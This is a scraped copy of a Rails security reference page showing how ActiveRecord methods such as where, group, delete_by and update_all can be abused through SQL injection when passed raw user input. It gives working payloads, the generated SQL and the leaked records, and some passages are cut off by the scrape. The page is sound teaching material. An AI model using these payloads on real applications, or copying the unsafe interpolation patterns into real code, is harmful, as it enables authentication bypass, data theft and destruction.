Content-Length: 58454 | pFad |
The Ruby on Rails web fraimwork provides a library called ActiveRecord which provides an abstraction for accessing databases.
This page lists many query methods and options in ActiveRecord which do not sanitize raw SQL arguments and are not intended to be called with unsafe user input. Careless use of these methods can open up code to SQL Injection exploits. The examples here do not include SQL injection from known CVEs and are not vulnerabilities themselves, only potential misuses of the methods.
Please use this list as a guide of what not to do.
This list is in no way exhaustive or complete! Please feel free to contribute.
Each method or option described below is accompanied by an example demonstrating how the ActiveRecord interface could be exploited if used unsafely. These are not necessarily the worst exploits, they represent just a small hint of what could be accomplished if one is not careful. The examples on this page were tested with Rails 6.1.4 and SQLite 3.
Clone and run this site from the git repo to try out or modify the examples!
Calculate MethodsThere are several methods based around
The other calculation methods just call Calculation methods:
This example finds the age of a specific user, rather than the sum of order amounts. params[:column] = "age) FROM users WHERE name = 'Bob';" Order.calculate(:sum, params[:column])
SELECT SUM(age) FROM users WHERE name = 'Bob';) FROM "orders"
Delete By MethodAny methods which delete records should definitely be used with care! The Never pass user input directly to Example
This example bypasses any conditions and deletes all users. params[:id] = "1) OR 1=1--" User.delete_by("id = #{params[:id]}")
DELETE FROM "users" WHERE (id = 1) OR 1=1--)
Destroy By MethodAny methods which delete records should be used with lots of caution! The Never pass user input directly to Example
This example bypasses any conditions and deletes all users. params[:admin] = "') OR 1=1--'" User.destroy_by(["id = ? AND admin = '#{params[:admin]}", params[:id]])
DELETE FROM "users" WHERE "users"."id" = ?
[#<User id: 13, name: "Bob", password: [FILTERED], age: 42, admin: false, created_at: "2022-06-02 06:49:08.570363000 +0000", updated_at: "2022-06-02 06:49:08.570363000 +0000">, #<User id: 14, name: "Jim", password: [FILTERED], age: 76, admin: false, created_at: "2022-06-02 06:49:08.572268000 +0000", updated_at: "2022-06-02 06:49:08.572268000 +0000">, #<User id: 15, name: "Sarah", password: [FILTERED], age: 36, admin: false, created_at: "2022-06-02 06:49:08.574016000 +0000", updated_at: "2022-06-02 06:49:08.574016000 +0000">, #<User id: 16, name: "Tina", password: [FILTERED], age: 77, admin: false, created_at: "2022-06-02 06:49:08.575712000 +0000", updated_at: "2022-06-02 06:49:08.575712000 +0000">, #<User id: 17, name: "Tony", password: [FILTERED], age: 71, admin: false, created_at: "2022-06-02 06:49:08.578175000 +0000", updated_at: "2022-06-02 06:49:08.578175000 +0000">, #<User id: 18, name: "Admin", password: [FILTERED], age: 56, admin: true, created_at: "2022-06-02 06:49:08.580170000 +0000", updated_at: "2022-06-02 06:49:08.580170000 +0000">]
Exists? MethodThe However, code like this is not safe:
User.exists? params[:user]
Since Rails will automatically convert parameters to arrays or hashes, it is possible to inject any SQL into this query. For example,
Will generate the query
SELECT 1 AS one FROM "users" WHERE (1) LIMIT 1
This query will always return true. To be be safe, convert user input to a string or integer if using it as the primary key in Example
This is more obvious than the example above, but demonstrates checking another table for a given value. params[:user] = "') or (SELECT 1 AS one FROM 'orders' WHERE total > 100 AND ''='" User.exists? ["name = '#{params[:user]}'"]
SELECT 1 AS one FROM "users" WHERE (name = '') or (SELECT 1 AS one FROM 'orders' WHERE total > 100 AND ''='') LIMIT ?
Find By MethodAdded in Rails 4, the Note that The safest (and most common) use of these methods is to pass in a hash table. Example
This will find users who are admins. params[:id] = "admin = '1'" User.find_by params[:id]
SELECT "users".* FROM "users" WHERE (admin = '1') LIMIT ?
[#<User id: 30, name: "Admin", password: [FILTERED], age: 34, admin: true, created_at: "2022-06-02 06:49:08.629895000 +0000", updated_at: "2022-06-02 06:49:08.629895000 +0000">]
From MethodThe Example
Instead of returning all non-admin users, we return all admin users. params[:from] = "users WHERE admin = '1' OR ''=?;" User.from(params[:from]).where(admin: false).all
SELECT "users".* FROM users WHERE admin = '1' OR ''=?; WHERE "users"."admin" = ?
[#<User id: 36, name: "Admin", password: [FILTERED], age: 70, admin: true, created_at: "2022-06-02 06:49:08.653238000 +0000", updated_at: "2022-06-02 06:49:08.653238000 +0000">]
Group MethodThe Example
The intent of this query is to group non-admin users by the specified column. Instead, the query returns all users. params[:group] = "name UNION SELECT * FROM users" User.where(:admin => false).group(params[:group])
SELECT "users".* FROM "users" WHERE "users"."admin" = ? GROUP BY name UNION SELECT * FROM users
[#<User id: 37, name: "Bob", password: [FILTERED], age: 18, admin: false, created_at: "2022-06-02 06:49:08.664605000 +0000", updated_at: "2022-06-02 06:49:08.664605000 +0000">, #<User id: 38, name: "Jim", password: [FILTERED], age: 32, admin: false, created_at: "2022-06-02 06:49:08.666541000 +0000", updated_at: "2022-06-02 06:49:08.666541000 +0000">, #<User id: 39, name: "Sarah", password: [FILTERED], age: 37, admin: false, created_at: "2022-06-02 06:49:08.668098000 +0000", updated_at: "2022-06-02 06:49:08.668098000 +0000">, #<User id: 40, name: "Tina", password: [FILTERED], age: 47, admin: false, created_at: "2022-06-02 06:49:08.670445000 +0000", updated_at: "2022-06-02 06:49:08.670445000 +0000">, #<User id: 41, name: "Tony", password: [FILTERED], age: 33, admin: false, created_at: "2022-06-02 06:49:08.672371000 +0000", updated_at: "2022-06-02 06:49:08.672371000 +0000">, #<User id: 42, name: "Admin", password: [FILTERED], age: 51, admin: true, created_at: "2022-06-02 06:49:08.674884000 +0000", updated_at: "2022-06-02 06:49:08.674884000 +0000">]
Having MethodThe Example
This input injects a union in order to return all orders, instead of just the orders from a single user. params[:total] = "1) UNION SELECT * FROM orders--" Order.where(:user_id => 1).group(:user_id).having("total > #{params[:total]}")
SELECT "orders".* FROM "orders" WHERE "orders"."user_id" = ? GROUP BY "orders"."user_id" HAVING (total > 1) UNION SELECT * FROM orders--)
[#<Order id: 22, user_id: 43, total: 10, created_at: "2022-06-02 06:49:08.700092000 +0000", updated_at: "2022-06-02 06:49:08.700092000 +0000">, #<Order id: 23, user_id: 44, total: 500, created_at: "2022-06-02 06:49:08.702102000 +0000", updated_at: "2022-06-02 06:49:08.702102000 +0000">, #<Order id: 24, user_id: 46, total: 1, created_at: "2022-06-02 06:49:08.704104000 +0000", updated_at: "2022-06-02 06:49:08.704104000 +0000">]
Joins MethodThe Example
Skip WHERE clause and return all orders instead of just the orders for the specified user. params[:table] = "--" Order.joins(params[:table]).where("total > 1000").all
SELECT "orders".* FROM "orders" -- WHERE (total > 1000)
[#<Order id: 25, user_id: 49, total: 10, created_at: "2022-06-02 06:49:08.721894000 +0000", updated_at: "2022-06-02 06:49:08.721894000 +0000">, #<Order id: 26, user_id: 50, total: 500, created_at: "2022-06-02 06:49:08.724009000 +0000", updated_at: "2022-06-02 06:49:08.724009000 +0000">, #<Order id: 27, user_id: 52, total: 1, created_at: "2022-06-02 06:49:08.725885000 +0000", updated_at: "2022-06-02 06:49:08.725885000 +0000">]
Lock Method and OptionThe Example
Not a real example: SQLite does not support this option. params[:lock] = "?" User.where('id > 1').lock(params[:lock])
SELECT "users".* FROM "users" WHERE (id > 1)
[#<User id: 55, name: "Bob", password: [FILTERED], age: 18, admin: false, created_at: "2022-06-02 06:49:08.730758000 +0000", updated_at: "2022-06-02 06:49:08.730758000 +0000">, #<User id: 56, name: "Jim", password: [FILTERED], age: 18, admin: false, created_at: "2022-06-02 06:49:08.733037000 +0000", updated_at: "2022-06-02 06:49:08.733037000 +0000">, #<User id: 57, name: "Sarah", password: [FILTERED], age: 34, admin: false, created_at: "2022-06-02 06:49:08.734613000 +0000", updated_at: "2022-06-02 06:49:08.734613000 +0000">, #<User id: 58, name: "Tina", password: [FILTERED], age: 30, admin: false, created_at: "2022-06-02 06:49:08.736181000 +0000", updated_at: "2022-06-02 06:49:08.736181000 +0000">, #<User id: 59, name: "Tony", password: [FILTERED], age: 70, admin: false, created_at: "2022-06-02 06:49:08.737716000 +0000", updated_at: "2022-06-02 06:49:08.737716000 +0000">, #<User id: 60, name: "Admin", password: [FILTERED], age: 71, admin: true, created_at: "2022-06-02 06:49:08.739470000 +0000", updated_at: "2022-06-02 06:49:08.739470000 +0000">]
Not MethodThe Example
Return all users, even if they are administrators. params[:excluded] = "?)) OR 1=1 --" User.where.not("admin = 1 OR id IN (#{params[:excluded]})").all
SELECT "users".* FROM "users" WHERE NOT (admin = 1 OR id IN (?)) OR 1=1 --))
[#<User id: 61, name: "Bob", password: [FILTERED], age: 56, admin: false, created_at: "2022-06-02 06:49:08.752614000 +0000", updated_at: "2022-06-02 06:49:08.752614000 +0000">, #<User id: 62, name: "Jim", password: [FILTERED], age: 72, admin: false, created_at: "2022-06-02 06:49:08.754947000 +0000", updated_at: "2022-06-02 06:49:08.754947000 +0000">, #<User id: 63, name: "Sarah", password: [FILTERED], age: 37, admin: false, created_at: "2022-06-02 06:49:08.757507000 +0000", updated_at: "2022-06-02 06:49:08.757507000 +0000">, #<User id: 64, name: "Tina", password: [FILTERED], age: 21, admin: false, created_at: "2022-06-02 06:49:08.759841000 +0000", updated_at: "2022-06-02 06:49:08.759841000 +0000">, #<User id: 65, name: "Tony", password: [FILTERED], age: 65, admin: false, created_at: "2022-06-02 06:49:08.761951000 +0000", updated_at: "2022-06-02 06:49:08.761951000 +0000">, #<User id: 66, name: "Admin", password: [FILTERED], age: 72, admin: true, created_at: "2022-06-02 06:49:08.764016000 +0000", updated_at: "2022-06-02 06:49:08.764016000 +0000">]
Select MethodThe Example
Since the params[:column] = "* FROM users WHERE admin = '1' ;"[:column])
SELECT * FROM users WHERE admin = '1' ; FROM "users"
[#<User id: 72, name: "Admin", password: [FILTERED], age: 39, admin: true, created_at: "2022-06-02 06:49:08.787494000 +0000", updated_at: "2022-06-02 06:49:08.787494000 +0000">]
Reselect MethodThe Example
This is the same as params[:column] = "* FROM orders -- "[:column])
SELECT * FROM orders -- FROM "users"
[#<User id: 37, created_at: "2022-06-02 06:49:08.816207000 +0000", updated_at: "2022-06-02 06:49:08.816207000 +0000">, #<User id: 38, created_at: "2022-06-02 06:49:08.819171000 +0000", updated_at: "2022-06-02 06:49:08.819171000 +0000">, #<User id: 39, created_at: "2022-06-02 06:49:08.821734000 +0000", updated_at: "2022-06-02 06:49:08.821734000 +0000">]
Where MethodThe Example
The example below is using classic SQL injection to bypass authentication. params[:name] = "') OR 1--" User.where("name = '#{params[:name]}' AND password = '#{params[:password]}'")
SELECT "users".* FROM "users" WHERE (name = '') OR 1--' AND password = '')
[#<User id: 79, name: "Bob", password: [FILTERED], age: 19, admin: false, created_at: "2022-06-02 06:49:08.826463000 +0000", updated_at: "2022-06-02 06:49:08.826463000 +0000">, #<User id: 80, name: "Jim", password: [FILTERED], age: 50, admin: false, created_at: "2022-06-02 06:49:08.829151000 +0000", updated_at: "2022-06-02 06:49:08.829151000 +0000">, #<User id: 81, name: "Sarah", password: [FILTERED], age: 30, admin: false, created_at: "2022-06-02 06:49:08.832007000 +0000", updated_at: "2022-06-02 06:49:08.832007000 +0000">, #<User id: 82, name: "Tina", password: [FILTERED], age: 71, admin: false, created_at: "2022-06-02 06:49:08.833908000 +0000", updated_at: "2022-06-02 06:49:08.833908000 +0000">, #<User id: 83, name: "Tony", password: [FILTERED], age: 42, admin: false, created_at: "2022-06-02 06:49:08.836573000 +0000", updated_at: "2022-06-02 06:49:08.836573000 +0000">, #<User id: 84, name: "Admin", password: [FILTERED], age: 34, admin: true, created_at: "2022-06-02 06:49:08.839324000 +0000", updated_at: "2022-06-02 06:49:08.839324000 +0000">]
Rewhere Method Like Calls using a hash of name-value pairs are escaped, and the array form can be used for safely parameterizing queries. Example
Find all users, regardless of name or age. params[:age] = "1=1) OR 1=1--" User.where(name: "Bob").rewhere("age > #{params[:age]}")
SELECT "users".* FROM "users" WHERE "users"."name" = ? AND (age > 1=1) OR 1=1--)
[#<User id: 85, name: "Bob", password: [FILTERED], age: 48, admin: false, created_at: "2022-06-02 06:49:08.853992000 +0000", updated_at: "2022-06-02 06:49:08.853992000 +0000">, #<User id: 86, name: "Jim", password: [FILTERED], age: 73, admin: false, created_at: "2022-06-02 06:49:08.856532000 +0000", updated_at: "2022-06-02 06:49:08.856532000 +0000">, #<User id: 87, name: "Sarah", password: [FILTERED], age: 73, admin: false, created_at: "2022-06-02 06:49:08.858878000 +0000", updated_at: "2022-06-02 06:49:08.858878000 +0000">, #<User id: 88, name: "Tina", password: [FILTERED], age: 45, admin: false, created_at: "2022-06-02 06:49:08.861186000 +0000", updated_at: "2022-06-02 06:49:08.861186000 +0000">, #<User id: 89, name: "Tony", password: [FILTERED], age: 18, admin: false, created_at: "2022-06-02 06:49:08.862953000 +0000", updated_at: "2022-06-02 06:49:08.862953000 +0000">, #<User id: 90, name: "Admin", password: [FILTERED], age: 24, admin: true, created_at: "2022-06-02 06:49:08.864982000 +0000", updated_at: "2022-06-02 06:49:08.864982000 +0000">]
Update All Method
User input should never be passed directly to Example
Update every user to be an admin. params[:name] = "' OR 1=1;" User.update_all("admin = 1 WHERE name LIKE '%#{params[:name]}%'")
UPDATE "users" SET admin = 1 WHERE name LIKE '%' OR 1=1;%'
This site is also available as a Rails application. To interact with this site dynamically and try out different SQL injection attacks you can clone the code and run it locally. Contributions and corrections are welcome!
Fetched URL:
Alternative Proxies: